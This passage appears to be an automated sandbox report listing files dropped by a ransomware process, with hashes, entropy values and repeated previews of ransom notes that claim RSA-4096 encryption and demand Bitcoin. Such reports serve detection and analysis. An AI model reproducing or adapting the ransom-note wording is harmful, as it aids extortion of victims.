                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\Scripts\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\UEV\Scripts\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\Templates\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\Templates\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\UEV\Templates\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\UEV\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\UEV\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\User Account Pictures\guest.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5776
                  Entropy (8bit):7.947189807063984
                  Encrypted:false
                  SSDEEP:96:IToELP9EH8SUyTQgLI4kU9FljZdjaH/X9LTwq3ARNu6e1a2hqiEDY84fTSOHy0W:h+SHzq8k6j/afX9fNQRNubsNi91fhY
                  MD5:A70111E6F3F970AE8131A9F0DB71E9C8
                  SHA1:AD269AC98CF83D5305617EBC8D74B589F08BDCD1
                  SHA-256:C908BB84703F0D2971684B1B6F1B55DBDFD10056DED5E120AB3E9B67F88D34D7
                  SHA-512:D849B77444B49D7067133E2EBB0FD30E1B986225FE1820A91815A96AA37AD49DF5F15E2CB9E92C6DFABCB3B39191358D8706D39973857B1A0DA40EF7B58D2785
                  Malicious:false
                  C:\ProgramData\Microsoft\User Account Pictures\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\User Account Pictures\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\User Account Pictures\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\User Account Pictures\user-192.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2784
                  Entropy (8bit):7.876414826205081
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\User Account Pictures\user-32.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):784
                  Entropy (8bit):7.344137297701923
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\User Account Pictures\user-40.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):816
                  Entropy (8bit):7.381735020777451
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\User Account Pictures\user-48.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880
                  Entropy (8bit):7.403990204408736
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\User Account Pictures\user.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5776
                  Entropy (8bit):7.947189807063984
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Vault\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Vault\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\Vault\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WDF\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WDF\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\WDF\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WinMSIPC\Server\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WinMSIPC\Server\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  Malicious:false
                  C:\ProgramData\Microsoft\WinMSIPC\Server\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\WinMSIPC\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\WinMSIPC\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
